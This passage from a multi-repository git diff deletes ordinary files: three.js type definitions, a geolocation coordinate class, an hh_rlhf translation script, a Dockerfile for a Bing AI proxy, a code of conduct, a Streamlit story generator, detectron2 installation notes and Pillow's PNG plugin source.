Texture; - alphaMap?: Texture; - envMap?: Texture; - envMapIntensity?: number; - refractionRatio?: number; - wireframe?: boolean; - wireframeLinewidth?: number; - skinning?: boolean; - morphTargets?: boolean; - morphNormals?: boolean; -} - -export class MeshStandardMaterial extends Material { - constructor(parameters?: MeshStandardMaterialParameters); - - defines: any; - color: Color; - roughness: number; - metalness: number; - map: Texture | null; - lightMap: Texture | null; - lightMapIntensity: number; - aoMap: Texture | null; - aoMapIntensity: number; - emissive: Color; - emissiveIntensity: number; - emissiveMap: Texture | null; - bumpMap: Texture | null; - bumpScale: number; - normalMap: Texture | null; - normalScale: number; - displacementMap: Texture | null; - displacementScale: number; - displacementBias: number; - roughnessMap: Texture | null; - metalnessMap: Texture | null; - alphaMap: Texture | null; - envMap: Texture | null; - envMapIntensity: number; - refractionRatio: number; - wireframe: boolean; - wireframeLinewidth: number; - skinning: boolean; - morphTargets: boolean; - morphNormals: boolean; - - setValues(parameters: MeshStandardMaterialParameters): void; -} diff --git 
a/spaces/bastiendechamps/geoguessr-bot/geoguessr_bot/interfaces.py b/spaces/bastiendechamps/geoguessr-bot/geoguessr_bot/interfaces.py deleted file mode 100644 index 34574f46d0400032591d2bb0ab4b56dc14eeb9c2..0000000000000000000000000000000000000000 --- a/spaces/bastiendechamps/geoguessr-bot/geoguessr_bot/interfaces.py +++ /dev/null @@ -1,23 +0,0 @@ -import numpy as np -from pydantic.main import BaseModel - - -class Coordinate(BaseModel): - latitude: float - longitude: float - - def __str__(self): - return f"({round(self.latitude, 6)}, {round(self.longitude, 6)})" - - def to_radians(self) -> 'Coordinate': - return Coordinate( - latitude=self.latitude * np.pi / 180., - longitude=self.longitude * np.pi / 180. - ) - - @staticmethod - def from_radians(latitude: float, longitude: float) -> 'Coordinate': - return Coordinate( - latitude=latitude * 180. / np.pi, - longitude=longitude * 180. / np.pi - ) \ No newline at end of file diff --git a/spaces/bigPear/digitalWDF/tests/translate_hh_rlhf.py b/spaces/bigPear/digitalWDF/tests/translate_hh_rlhf.py deleted file mode 100644 index 1a20ee6fe90bd2daacb29dbf6b9547c1dfa8f7ee..0000000000000000000000000000000000000000 --- a/spaces/bigPear/digitalWDF/tests/translate_hh_rlhf.py +++ /dev/null @@ -1,69 +0,0 @@ -# coding=utf-8 - -import os -import json -import time -from datasets import load_dataset -from googletrans import Translator - - -def main(): - split = "train" - - translator = Translator() - def translate(text: str) -> str: - if len(text) == 0: - return "" - if text.startswith("http") or text.startswith("Reddit.com"): - return text - - local_patience = 0 - while local_patience < 5: - try: - result = translator.translate(text, dest="zh-cn", src="en") - print("translate: {} -> {}".format(text, result.text)) - time.sleep(1) - return result.text - except Exception: - print(f"Error occurred while translating {text}, retrying...") - local_patience += 1 - time.sleep(10) - - raise Exception - - dataset = load_dataset("../data/hh_rlhf_en", split=split) - - if os.path.exists(f"{split}.json"): - with open(f"{split}.json", "r", encoding="utf-8", newline="\n") as f: - jsondata = json.load(f) - else: - jsondata = [] - - - global_patience = 0 - i = len(jsondata) - while i < len(dataset): - try: - jsondata.append({ - "instruction": translate(dataset[i]["instruction"]), - "output": [translate(output) for output in dataset[i]["output"]], - "history": [[translate(hist[0]), translate(hist[1])] for hist in dataset[i]["history"]] - }) - i += 1 - global_patience = 0 - - if i % 10 == 0: - with open(f"{split}.json", "w", encoding="utf-8", newline="\n") as f: - json.dump(jsondata, f, indent=2, ensure_ascii=False) - - except Exception: - print(f"Error occurred at {i}-th data, retrying...") - global_patience += 1 - time.sleep(50) - - if global_patience > 10: - print("Stop") - return - -if __name__ == "__main__": - main() diff --git a/spaces/bnkkkkknn/bnkkkkknn/Dockerfile b/spaces/bnkkkkknn/bnkkkkknn/Dockerfile deleted file mode 100644 index 3698c7cb7938e025afc53b18a571ae2961fbdffe..0000000000000000000000000000000000000000 --- a/spaces/bnkkkkknn/bnkkkkknn/Dockerfile +++ /dev/null @@ -1,34 +0,0 @@ -# Build Stage -# 使用 golang:alpine 作为构建阶段的基础镜像 -FROM golang:alpine AS builder - -# 添加 git,以便之后能从GitHub克隆项目 -RUN apk --no-cache add git - -# 从 GitHub 克隆 go-proxy-bingai 项目到 /workspace/app 目录下 -RUN git clone https://github.com/Harry-zklcdc/go-proxy-bingai.git /workspace/app - -# 设置工作目录为之前克隆的项目目录 -WORKDIR /workspace/app - -# 编译 go 项目。-ldflags="-s -w" 是为了减少编译后的二进制大小 -RUN go build -ldflags="-s 
-w" -tags netgo -trimpath -o go-proxy-bingai main.go - -# Runtime Stage -# 使用轻量级的 alpine 镜像作为运行时的基础镜像 -FROM alpine - -# 设置工作目录 -WORKDIR /workspace/app - -# 从构建阶段复制编译后的二进制文件到运行时镜像中 -COPY --from=builder /workspace/app/go-proxy-bingai . - -# 设置环境变量,此处为随机字符 -ENV Go_Proxy_BingAI_USER_TOKEN_1="kJs8hD92ncMzLaoQWYtX5rG6bE3fZ4iO" - -# 暴露8080端口 -EXPOSE 8080 - -# 容器启动时运行的命令 -CMD ["/workspace/app/go-proxy-bingai"] \ No newline at end of file diff --git a/spaces/brainblow/AudioCreator_Music-Audio_Generation/CODE_OF_CONDUCT.md b/spaces/brainblow/AudioCreator_Music-Audio_Generation/CODE_OF_CONDUCT.md deleted file mode 100644 index 83f431e8feeb7e80d571f39c9f6c1b96857b5f85..0000000000000000000000000000000000000000 --- a/spaces/brainblow/AudioCreator_Music-Audio_Generation/CODE_OF_CONDUCT.md +++ /dev/null @@ -1,80 +0,0 @@ -# Code of Conduct - -## Our Pledge - -In the interest of fostering an open and welcoming environment, we as -contributors and maintainers pledge to make participation in our project and -our community a harassment-free experience for everyone, regardless of age, body -size, disability, ethnicity, sex characteristics, gender identity and expression, -level of experience, education, socio-economic status, nationality, personal -appearance, race, religion, or sexual identity and orientation. - -## Our Standards - -Examples of behavior that contributes to creating a positive environment -include: - -* Using welcoming and inclusive language -* Being respectful of differing viewpoints and experiences -* Gracefully accepting constructive criticism -* Focusing on what is best for the community -* Showing empathy towards other community members - -Examples of unacceptable behavior by participants include: - -* The use of sexualized language or imagery and unwelcome sexual attention or -advances -* Trolling, insulting/derogatory comments, and personal or political attacks -* Public or private harassment -* Publishing others' private information, such as a physical or electronic -address, without explicit permission -* Other conduct which could reasonably be considered inappropriate in a -professional setting - -## Our Responsibilities - -Project maintainers are responsible for clarifying the standards of acceptable -behavior and are expected to take appropriate and fair corrective action in -response to any instances of unacceptable behavior. - -Project maintainers have the right and responsibility to remove, edit, or -reject comments, commits, code, wiki edits, issues, and other contributions -that are not aligned to this Code of Conduct, or to ban temporarily or -permanently any contributor for other behaviors that they deem inappropriate, -threatening, offensive, or harmful. - -## Scope - -This Code of Conduct applies within all project spaces, and it also applies when -an individual is representing the project or its community in public spaces. -Examples of representing a project or community include using an official -project e-mail address, posting via an official social media account, or acting -as an appointed representative at an online or offline event. Representation of -a project may be further defined and clarified by project maintainers. - -This Code of Conduct also applies outside the project spaces when there is a -reasonable belief that an individual's behavior may have a negative impact on -the project or its community. - -## Enforcement - -Instances of abusive, harassing, or otherwise unacceptable behavior may be -reported by contacting the project team at . 
All -complaints will be reviewed and investigated and will result in a response that -is deemed necessary and appropriate to the circumstances. The project team is -obligated to maintain confidentiality with regard to the reporter of an incident. -Further details of specific enforcement policies may be posted separately. - -Project maintainers who do not follow or enforce the Code of Conduct in good -faith may face temporary or permanent repercussions as determined by other -members of the project's leadership. - -## Attribution - -This Code of Conduct is adapted from the [Contributor Covenant][homepage], version 1.4, -available at https://www.contributor-covenant.org/version/1/4/code-of-conduct.html - -[homepage]: https://www.contributor-covenant.org - -For answers to common questions about this code of conduct, see -https://www.contributor-covenant.org/faq diff --git a/spaces/breadlicker45/story-gen/app.py b/spaces/breadlicker45/story-gen/app.py deleted file mode 100644 index 0b241f37eae052609ebd96250dca365a21a22bcc..0000000000000000000000000000000000000000 --- a/spaces/breadlicker45/story-gen/app.py +++ /dev/null @@ -1,68 +0,0 @@ -import streamlit as st -import time -from transformers import pipeline -import torch -trust_remote_code=True -st.markdown('## story-generation from Breadlicker45') -use_auth_token=True -@st.cache(allow_output_mutation=True, suppress_st_warning =True, show_spinner=False) -def get_model(): - return pipeline('text-generation', model=model, do_sample=True) - -col1, col2 = st.columns([2,1]) - -with st.sidebar: - st.markdown('## Model Parameters') - - max_length = st.slider('Max text length', 80, 2000, 80) - - min_length = st.slider('Min text length', 80, 500, 80) - - num_beams = st.slider('N° tree beams search', 1, 15, 1) - - temperature = st.slider('temperature', 0.0, 1.0, 0.5, 0.1) - - early_stopping = st.selectbox( - 'Early stopping text generation', - ('True', 'False'), key={'True' : True, 'False': False}, index=0) - - no_ngram_repeat = st.slider('Max repetition limit', 1, 3, 1) - - - -with col1: - prompt= st.text_area('Your prompt here', - '''in a world''') - -with col2: - select_model = st.radio( - "Select the model to use:", - ('StoryPy', 'null'), index = 0) - - if select_model == 'StoryPy': - model = 'BreadAi/StoryPy' - elif select_model == 'null': - model = 'BreadAi/StoryPy' - elif select_model == 'MuseNeo': - model = 'breadlicker45/MuseNeo' - elif select_model == 'MusePy-1-1': - model = 'BreadAi/MusePy-1-1' - elif select_model == 'MuseCan': - model = 'BreadAi/MuseCan' - - with st.spinner('Loading Model... 
(This may take a while)'): - generator = get_model() - st.success('Model loaded correctly!') - -gen = st.info('Generating text...') -answer = generator(prompt, - max_length=max_length, no_repeat_ngram_size=no_ngram_repeat, - early_stopping=early_stopping, num_beams=num_beams, min_length=min_length, temperature=temperature) -gen.empty() - -lst = answer[0]['generated_text'] - -t = st.empty() -for i in range(len(lst)): - t.markdown("#### %s" % lst[0:i]) - time.sleep(0.04) \ No newline at end of file diff --git a/spaces/brjathu/HMR2.0/vendor/detectron2/INSTALL.md b/spaces/brjathu/HMR2.0/vendor/detectron2/INSTALL.md deleted file mode 100644 index f522e6f624372f39ee5366f5b032c0cd1ebcf5c8..0000000000000000000000000000000000000000 --- a/spaces/brjathu/HMR2.0/vendor/detectron2/INSTALL.md +++ /dev/null @@ -1,261 +0,0 @@ -## Installation - -### Requirements -- Linux or macOS with Python ≥ 3.7 -- PyTorch ≥ 1.8 and [torchvision](https://github.com/pytorch/vision/) that matches the PyTorch installation. - Install them together at [pytorch.org](https://pytorch.org) to make sure of this -- OpenCV is optional but needed by demo and visualization - - -### Build Detectron2 from Source - -gcc & g++ ≥ 5.4 are required. [ninja](https://ninja-build.org/) is optional but recommended for faster build. -After having them, run: -``` -python -m pip install 'git+https://github.com/facebookresearch/detectron2.git' -# (add --user if you don't have permission) - -# Or, to install it from a local clone: -git clone https://github.com/facebookresearch/detectron2.git -python -m pip install -e detectron2 - -# On macOS, you may need to prepend the above commands with a few environment variables: -CC=clang CXX=clang++ ARCHFLAGS="-arch x86_64" python -m pip install ... -``` - -To __rebuild__ detectron2 that's built from a local clone, use `rm -rf build/ **/*.so` to clean the -old build first. You often need to rebuild detectron2 after reinstalling PyTorch. - -### Install Pre-Built Detectron2 (Linux only) - -Choose from this table to install [v0.6 (Oct 2021)](https://github.com/facebookresearch/detectron2/releases): - -
    CUDA torch 1.10torch 1.9torch 1.8
    11.3
    install
    python -m pip install detectron2 -f \
    -  https://dl.fbaipublicfiles.com/detectron2/wheels/cu113/torch1.10/index.html
    -
    11.1
    install
    python -m pip install detectron2 -f \
    -  https://dl.fbaipublicfiles.com/detectron2/wheels/cu111/torch1.10/index.html
    -
    install
    python -m pip install detectron2 -f \
    -  https://dl.fbaipublicfiles.com/detectron2/wheels/cu111/torch1.9/index.html
    -
    install
    python -m pip install detectron2 -f \
    -  https://dl.fbaipublicfiles.com/detectron2/wheels/cu111/torch1.8/index.html
    -
    10.2
    install
    python -m pip install detectron2 -f \
    -  https://dl.fbaipublicfiles.com/detectron2/wheels/cu102/torch1.10/index.html
    -
    install
    python -m pip install detectron2 -f \
    -  https://dl.fbaipublicfiles.com/detectron2/wheels/cu102/torch1.9/index.html
    -
    install
    python -m pip install detectron2 -f \
    -  https://dl.fbaipublicfiles.com/detectron2/wheels/cu102/torch1.8/index.html
    -
    10.1
    install
    python -m pip install detectron2 -f \
    -  https://dl.fbaipublicfiles.com/detectron2/wheels/cu101/torch1.8/index.html
    -
    cpu
    install
    python -m pip install detectron2 -f \
    -  https://dl.fbaipublicfiles.com/detectron2/wheels/cpu/torch1.10/index.html
    -
    install
    python -m pip install detectron2 -f \
    -  https://dl.fbaipublicfiles.com/detectron2/wheels/cpu/torch1.9/index.html
    -
    install
    python -m pip install detectron2 -f \
    -  https://dl.fbaipublicfiles.com/detectron2/wheels/cpu/torch1.8/index.html
    -
    - -Note that: -1. The pre-built packages have to be used with corresponding version of CUDA and the official package of PyTorch. - Otherwise, please build detectron2 from source. -2. New packages are released every few months. Therefore, packages may not contain latest features in the main - branch and may not be compatible with the main branch of a research project that uses detectron2 - (e.g. those in [projects](projects)). - -### Common Installation Issues - -Click each issue for its solutions: - -
    - -Undefined symbols that looks like "TH..","at::Tensor...","torch..." - -
    - -This usually happens when detectron2 or torchvision is not -compiled with the version of PyTorch you're running. - -If the error comes from a pre-built torchvision, uninstall torchvision and pytorch and reinstall them -following [pytorch.org](http://pytorch.org). So the versions will match. - -If the error comes from a pre-built detectron2, check [release notes](https://github.com/facebookresearch/detectron2/releases), -uninstall and reinstall the correct pre-built detectron2 that matches pytorch version. - -If the error comes from detectron2 or torchvision that you built manually from source, -remove files you built (`build/`, `**/*.so`) and rebuild it so it can pick up the version of pytorch currently in your environment. - -If the above instructions do not resolve this problem, please provide an environment (e.g. a dockerfile) that can reproduce the issue. -
    - -
    - -Missing torch dynamic libraries, OR segmentation fault immediately when using detectron2. - -This usually happens when detectron2 or torchvision is not -compiled with the version of PyTorch you're running. See the previous common issue for the solution. -
    - -
    - -Undefined C++ symbols (e.g. "GLIBCXX..") or C++ symbols not found. - -
    -Usually it's because the library is compiled with a newer C++ compiler but run with an old C++ runtime. - -This often happens with old anaconda. -It may help to run `conda update libgcc` to upgrade its runtime. - -The fundamental solution is to avoid the mismatch, either by compiling using older version of C++ -compiler, or run the code with proper C++ runtime. -To run the code with a specific C++ runtime, you can use environment variable `LD_PRELOAD=/path/to/libstdc++.so`. - -
    - -
    - -"nvcc not found" or "Not compiled with GPU support" or "Detectron2 CUDA Compiler: not available". - -
    -CUDA is not found when building detectron2. -You should make sure - -``` -python -c 'import torch; from torch.utils.cpp_extension import CUDA_HOME; print(torch.cuda.is_available(), CUDA_HOME)' -``` - -print `(True, a directory with cuda)` at the time you build detectron2. - -Most models can run inference (but not training) without GPU support. To use CPUs, set `MODEL.DEVICE='cpu'` in the config. -
    - -
    - -"invalid device function" or "no kernel image is available for execution". - -
    -Two possibilities: - -* You build detectron2 with one version of CUDA but run it with a different version. - - To check whether it is the case, - use `python -m detectron2.utils.collect_env` to find out inconsistent CUDA versions. - In the output of this command, you should expect "Detectron2 CUDA Compiler", "CUDA_HOME", "PyTorch built with - CUDA" - to contain cuda libraries of the same version. - - When they are inconsistent, - you need to either install a different build of PyTorch (or build by yourself) - to match your local CUDA installation, or install a different version of CUDA to match PyTorch. - -* PyTorch/torchvision/Detectron2 is not built for the correct GPU SM architecture (aka. compute capability). - - The architecture included by PyTorch/detectron2/torchvision is available in the "architecture flags" in - `python -m detectron2.utils.collect_env`. It must include - the architecture of your GPU, which can be found at [developer.nvidia.com/cuda-gpus](https://developer.nvidia.com/cuda-gpus). - - If you're using pre-built PyTorch/detectron2/torchvision, they have included support for most popular GPUs already. - If not supported, you need to build them from source. - - When building detectron2/torchvision from source, they detect the GPU device and build for only the device. - This means the compiled code may not work on a different GPU device. - To recompile them for the correct architecture, remove all installed/compiled files, - and rebuild them with the `TORCH_CUDA_ARCH_LIST` environment variable set properly. - For example, `export TORCH_CUDA_ARCH_LIST="6.0;7.0"` makes it compile for both P100s and V100s. -
    - -
    - -Undefined CUDA symbols; Cannot open libcudart.so - -
    -The version of NVCC you use to build detectron2 or torchvision does -not match the version of CUDA you are running with. -This often happens when using anaconda's CUDA runtime. - -Use `python -m detectron2.utils.collect_env` to find out inconsistent CUDA versions. -In the output of this command, you should expect "Detectron2 CUDA Compiler", "CUDA_HOME", "PyTorch built with - CUDA" -to contain cuda libraries of the same version. - -When they are inconsistent, -you need to either install a different build of PyTorch (or build by yourself) -to match your local CUDA installation, or install a different version of CUDA to match PyTorch. -
    - - -
    - -C++ compilation errors from NVCC / NVRTC, or "Unsupported gpu architecture" - -
    -A few possibilities: - -1. Local CUDA/NVCC version has to match the CUDA version of your PyTorch. Both can be found in `python collect_env.py` - (download from [here](./detectron2/utils/collect_env.py)). - When they are inconsistent, you need to either install a different build of PyTorch (or build by yourself) - to match your local CUDA installation, or install a different version of CUDA to match PyTorch. - -2. Local CUDA/NVCC version shall support the SM architecture (a.k.a. compute capability) of your GPU. - The capability of your GPU can be found at [developer.nvidia.com/cuda-gpus](https://developer.nvidia.com/cuda-gpus). - The capability supported by NVCC is listed at [here](https://gist.github.com/ax3l/9489132). - If your NVCC version is too old, this can be workaround by setting environment variable - `TORCH_CUDA_ARCH_LIST` to a lower, supported capability. - -3. The combination of NVCC and GCC you use is incompatible. You need to change one of their versions. - See [here](https://gist.github.com/ax3l/9489132) for some valid combinations. - Notably, CUDA<=10.1.105 doesn't support GCC>7.3. - - The CUDA/GCC version used by PyTorch can be found by `print(torch.__config__.show())`. - -
    - - -
    - -"ImportError: cannot import name '_C'". - -
    -Please build and install detectron2 following the instructions above. - -Or, if you are running code from detectron2's root directory, `cd` to a different one. -Otherwise you may not import the code that you installed. -
    - - -
    - -Any issue on windows. - -
    - -Detectron2 is continuously built on windows with [CircleCI](https://app.circleci.com/pipelines/github/facebookresearch/detectron2?branch=main). -However we do not provide official support for it. -PRs that improves code compatibility on windows are welcome. -
    - -
    - -ONNX conversion segfault after some "TraceWarning". - -
    -The ONNX package is compiled with a too old compiler. - -Please build and install ONNX from its source code using a compiler -whose version is closer to what's used by PyTorch (available in `torch.__config__.show()`). -
    - - -
    - -"library not found for -lstdc++" on older version of MacOS - -
    - -See [this stackoverflow answer](https://stackoverflow.com/questions/56083725/macos-build-issues-lstdc-not-found-while-building-python-package). - -
    - - -### Installation inside specific environments: - -* __Colab__: see our [Colab Tutorial](https://colab.research.google.com/drive/16jcaJoc6bCFAQ96jDe2HwtXj7BMD_-m5) - which has step-by-step instructions. - -* __Docker__: The official [Dockerfile](docker) installs detectron2 with a few simple commands. diff --git a/spaces/camilosegura/traductor-multilenguaje/Lib/site-packages/PIL/PngImagePlugin.py b/spaces/camilosegura/traductor-multilenguaje/Lib/site-packages/PIL/PngImagePlugin.py deleted file mode 100644 index bfa8cb7ac66c15e2f5d1128f4ba9a1ad69758ec1..0000000000000000000000000000000000000000 --- a/spaces/camilosegura/traductor-multilenguaje/Lib/site-packages/PIL/PngImagePlugin.py +++ /dev/null @@ -1,1456 +0,0 @@ -# -# The Python Imaging Library. -# $Id$ -# -# PNG support code -# -# See "PNG (Portable Network Graphics) Specification, version 1.0; -# W3C Recommendation", 1996-10-01, Thomas Boutell (ed.). -# -# history: -# 1996-05-06 fl Created (couldn't resist it) -# 1996-12-14 fl Upgraded, added read and verify support (0.2) -# 1996-12-15 fl Separate PNG stream parser -# 1996-12-29 fl Added write support, added getchunks -# 1996-12-30 fl Eliminated circular references in decoder (0.3) -# 1998-07-12 fl Read/write 16-bit images as mode I (0.4) -# 2001-02-08 fl Added transparency support (from Zircon) (0.5) -# 2001-04-16 fl Don't close data source in "open" method (0.6) -# 2004-02-24 fl Don't even pretend to support interlaced files (0.7) -# 2004-08-31 fl Do basic sanity check on chunk identifiers (0.8) -# 2004-09-20 fl Added PngInfo chunk container -# 2004-12-18 fl Added DPI read support (based on code by Niki Spahiev) -# 2008-08-13 fl Added tRNS support for RGB images -# 2009-03-06 fl Support for preserving ICC profiles (by Florian Hoech) -# 2009-03-08 fl Added zTXT support (from Lowell Alleman) -# 2009-03-29 fl Read interlaced PNG files (from Conrado Porto Lopes Gouvua) -# -# Copyright (c) 1997-2009 by Secret Labs AB -# Copyright (c) 1996 by Fredrik Lundh -# -# See the README file for information on usage and redistribution. -# - -import itertools -import logging -import re -import struct -import warnings -import zlib -from enum import IntEnum - -from . import Image, ImageChops, ImageFile, ImagePalette, ImageSequence -from ._binary import i16be as i16 -from ._binary import i32be as i32 -from ._binary import o8 -from ._binary import o16be as o16 -from ._binary import o32be as o32 - -logger = logging.getLogger(__name__) - -is_cid = re.compile(rb"\w\w\w\w").match - - -_MAGIC = b"\211PNG\r\n\032\n" - - -_MODES = { - # supported bits/color combinations, and corresponding modes/rawmodes - # Greyscale - (1, 0): ("1", "1"), - (2, 0): ("L", "L;2"), - (4, 0): ("L", "L;4"), - (8, 0): ("L", "L"), - (16, 0): ("I", "I;16B"), - # Truecolour - (8, 2): ("RGB", "RGB"), - (16, 2): ("RGB", "RGB;16B"), - # Indexed-colour - (1, 3): ("P", "P;1"), - (2, 3): ("P", "P;2"), - (4, 3): ("P", "P;4"), - (8, 3): ("P", "P"), - # Greyscale with alpha - (8, 4): ("LA", "LA"), - (16, 4): ("RGBA", "LA;16B"), # LA;16B->LA not yet available - # Truecolour with alpha - (8, 6): ("RGBA", "RGBA"), - (16, 6): ("RGBA", "RGBA;16B"), -} - - -_simple_palette = re.compile(b"^\xff*\x00\xff*$") - -MAX_TEXT_CHUNK = ImageFile.SAFEBLOCK -""" -Maximum decompressed size for a iTXt or zTXt chunk. -Eliminates decompression bombs where compressed chunks can expand 1000x. -See :ref:`Text in PNG File Format`. -""" -MAX_TEXT_MEMORY = 64 * MAX_TEXT_CHUNK -""" -Set the maximum total text chunk size. -See :ref:`Text in PNG File Format`. 
-""" - - -# APNG frame disposal modes -class Disposal(IntEnum): - OP_NONE = 0 - """ - No disposal is done on this frame before rendering the next frame. - See :ref:`Saving APNG sequences`. - """ - OP_BACKGROUND = 1 - """ - This frame’s modified region is cleared to fully transparent black before rendering - the next frame. - See :ref:`Saving APNG sequences`. - """ - OP_PREVIOUS = 2 - """ - This frame’s modified region is reverted to the previous frame’s contents before - rendering the next frame. - See :ref:`Saving APNG sequences`. - """ - - -# APNG frame blend modes -class Blend(IntEnum): - OP_SOURCE = 0 - """ - All color components of this frame, including alpha, overwrite the previous output - image contents. - See :ref:`Saving APNG sequences`. - """ - OP_OVER = 1 - """ - This frame should be alpha composited with the previous output image contents. - See :ref:`Saving APNG sequences`. - """ - - -def _safe_zlib_decompress(s): - dobj = zlib.decompressobj() - plaintext = dobj.decompress(s, MAX_TEXT_CHUNK) - if dobj.unconsumed_tail: - msg = "Decompressed Data Too Large" - raise ValueError(msg) - return plaintext - - -def _crc32(data, seed=0): - return zlib.crc32(data, seed) & 0xFFFFFFFF - - -# -------------------------------------------------------------------- -# Support classes. Suitable for PNG and related formats like MNG etc. - - -class ChunkStream: - def __init__(self, fp): - self.fp = fp - self.queue = [] - - def read(self): - """Fetch a new chunk. Returns header information.""" - cid = None - - if self.queue: - cid, pos, length = self.queue.pop() - self.fp.seek(pos) - else: - s = self.fp.read(8) - cid = s[4:] - pos = self.fp.tell() - length = i32(s) - - if not is_cid(cid): - if not ImageFile.LOAD_TRUNCATED_IMAGES: - msg = f"broken PNG file (chunk {repr(cid)})" - raise SyntaxError(msg) - - return cid, pos, length - - def __enter__(self): - return self - - def __exit__(self, *args): - self.close() - - def close(self): - self.queue = self.fp = None - - def push(self, cid, pos, length): - self.queue.append((cid, pos, length)) - - def call(self, cid, pos, length): - """Call the appropriate chunk handler""" - - logger.debug("STREAM %r %s %s", cid, pos, length) - return getattr(self, "chunk_" + cid.decode("ascii"))(pos, length) - - def crc(self, cid, data): - """Read and verify checksum""" - - # Skip CRC checks for ancillary chunks if allowed to load truncated - # images - # 5th byte of first char is 1 [specs, section 5.4] - if ImageFile.LOAD_TRUNCATED_IMAGES and (cid[0] >> 5 & 1): - self.crc_skip(cid, data) - return - - try: - crc1 = _crc32(data, _crc32(cid)) - crc2 = i32(self.fp.read(4)) - if crc1 != crc2: - msg = f"broken PNG file (bad header checksum in {repr(cid)})" - raise SyntaxError(msg) - except struct.error as e: - msg = f"broken PNG file (incomplete checksum in {repr(cid)})" - raise SyntaxError(msg) from e - - def crc_skip(self, cid, data): - """Read checksum""" - - self.fp.read(4) - - def verify(self, endchunk=b"IEND"): - # Simple approach; just calculate checksum for all remaining - # blocks. Must be called directly after open. 
- - cids = [] - - while True: - try: - cid, pos, length = self.read() - except struct.error as e: - msg = "truncated PNG file" - raise OSError(msg) from e - - if cid == endchunk: - break - self.crc(cid, ImageFile._safe_read(self.fp, length)) - cids.append(cid) - - return cids - - -class iTXt(str): - """ - Subclass of string to allow iTXt chunks to look like strings while - keeping their extra information - - """ - - @staticmethod - def __new__(cls, text, lang=None, tkey=None): - """ - :param cls: the class to use when creating the instance - :param text: value for this key - :param lang: language code - :param tkey: UTF-8 version of the key name - """ - - self = str.__new__(cls, text) - self.lang = lang - self.tkey = tkey - return self - - -class PngInfo: - """ - PNG chunk container (for use with save(pnginfo=)) - - """ - - def __init__(self): - self.chunks = [] - - def add(self, cid, data, after_idat=False): - """Appends an arbitrary chunk. Use with caution. - - :param cid: a byte string, 4 bytes long. - :param data: a byte string of the encoded data - :param after_idat: for use with private chunks. Whether the chunk - should be written after IDAT - - """ - - chunk = [cid, data] - if after_idat: - chunk.append(True) - self.chunks.append(tuple(chunk)) - - def add_itxt(self, key, value, lang="", tkey="", zip=False): - """Appends an iTXt chunk. - - :param key: latin-1 encodable text key name - :param value: value for this key - :param lang: language code - :param tkey: UTF-8 version of the key name - :param zip: compression flag - - """ - - if not isinstance(key, bytes): - key = key.encode("latin-1", "strict") - if not isinstance(value, bytes): - value = value.encode("utf-8", "strict") - if not isinstance(lang, bytes): - lang = lang.encode("utf-8", "strict") - if not isinstance(tkey, bytes): - tkey = tkey.encode("utf-8", "strict") - - if zip: - self.add( - b"iTXt", - key + b"\0\x01\0" + lang + b"\0" + tkey + b"\0" + zlib.compress(value), - ) - else: - self.add(b"iTXt", key + b"\0\0\0" + lang + b"\0" + tkey + b"\0" + value) - - def add_text(self, key, value, zip=False): - """Appends a text chunk. 
- - :param key: latin-1 encodable text key name - :param value: value for this key, text or an - :py:class:`PIL.PngImagePlugin.iTXt` instance - :param zip: compression flag - - """ - if isinstance(value, iTXt): - return self.add_itxt(key, value, value.lang, value.tkey, zip=zip) - - # The tEXt chunk stores latin-1 text - if not isinstance(value, bytes): - try: - value = value.encode("latin-1", "strict") - except UnicodeError: - return self.add_itxt(key, value, zip=zip) - - if not isinstance(key, bytes): - key = key.encode("latin-1", "strict") - - if zip: - self.add(b"zTXt", key + b"\0\0" + zlib.compress(value)) - else: - self.add(b"tEXt", key + b"\0" + value) - - -# -------------------------------------------------------------------- -# PNG image stream (IHDR/IEND) - - -class PngStream(ChunkStream): - def __init__(self, fp): - super().__init__(fp) - - # local copies of Image attributes - self.im_info = {} - self.im_text = {} - self.im_size = (0, 0) - self.im_mode = None - self.im_tile = None - self.im_palette = None - self.im_custom_mimetype = None - self.im_n_frames = None - self._seq_num = None - self.rewind_state = None - - self.text_memory = 0 - - def check_text_memory(self, chunklen): - self.text_memory += chunklen - if self.text_memory > MAX_TEXT_MEMORY: - msg = ( - "Too much memory used in text chunks: " - f"{self.text_memory}>MAX_TEXT_MEMORY" - ) - raise ValueError(msg) - - def save_rewind(self): - self.rewind_state = { - "info": self.im_info.copy(), - "tile": self.im_tile, - "seq_num": self._seq_num, - } - - def rewind(self): - self.im_info = self.rewind_state["info"] - self.im_tile = self.rewind_state["tile"] - self._seq_num = self.rewind_state["seq_num"] - - def chunk_iCCP(self, pos, length): - # ICC profile - s = ImageFile._safe_read(self.fp, length) - # according to PNG spec, the iCCP chunk contains: - # Profile name 1-79 bytes (character string) - # Null separator 1 byte (null character) - # Compression method 1 byte (0) - # Compressed profile n bytes (zlib with deflate compression) - i = s.find(b"\0") - logger.debug("iCCP profile name %r", s[:i]) - logger.debug("Compression method %s", s[i]) - comp_method = s[i] - if comp_method != 0: - msg = f"Unknown compression method {comp_method} in iCCP chunk" - raise SyntaxError(msg) - try: - icc_profile = _safe_zlib_decompress(s[i + 2 :]) - except ValueError: - if ImageFile.LOAD_TRUNCATED_IMAGES: - icc_profile = None - else: - raise - except zlib.error: - icc_profile = None # FIXME - self.im_info["icc_profile"] = icc_profile - return s - - def chunk_IHDR(self, pos, length): - # image header - s = ImageFile._safe_read(self.fp, length) - if length < 13: - if ImageFile.LOAD_TRUNCATED_IMAGES: - return s - msg = "Truncated IHDR chunk" - raise ValueError(msg) - self.im_size = i32(s, 0), i32(s, 4) - try: - self.im_mode, self.im_rawmode = _MODES[(s[8], s[9])] - except Exception: - pass - if s[12]: - self.im_info["interlace"] = 1 - if s[11]: - msg = "unknown filter category" - raise SyntaxError(msg) - return s - - def chunk_IDAT(self, pos, length): - # image data - if "bbox" in self.im_info: - tile = [("zip", self.im_info["bbox"], pos, self.im_rawmode)] - else: - if self.im_n_frames is not None: - self.im_info["default_image"] = True - tile = [("zip", (0, 0) + self.im_size, pos, self.im_rawmode)] - self.im_tile = tile - self.im_idat = length - raise EOFError - - def chunk_IEND(self, pos, length): - # end of PNG image - raise EOFError - - def chunk_PLTE(self, pos, length): - # palette - s = ImageFile._safe_read(self.fp, length) - if 
